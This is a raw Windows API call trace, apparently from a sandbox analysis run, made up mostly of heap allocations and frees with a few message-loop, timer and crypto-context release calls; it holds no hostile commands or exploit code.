HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0163.149] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0163.149] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0163.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0163.149] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0163.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0163.152] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0163.152] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0163.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0163.153] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0163.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0163.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0163.153] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0163.153] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0165.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0165.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0165.004] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0165.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0165.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0165.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0165.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0165.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0165.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0165.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699a8 [0165.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e699a8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0165.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0165.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0165.005] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0165.006] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0165.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0165.006] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0165.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0165.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0165.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0165.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0165.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0165.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0165.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0165.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0165.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0165.008] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0165.008] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0165.008] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0165.008] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0165.008] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0165.008] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0165.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0165.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0165.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0165.008] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0165.008] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0165.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0165.009] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0165.009] FreeLibrary (hLibModule=0x756e0000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0165.009] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0165.009] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0165.009] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0165.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0165.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0165.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0165.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0165.010] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0165.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0165.010] CloseHandle (hObject=0x2a0) returned 1 [0165.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0165.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0165.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0165.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0165.019] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0165.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0165.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 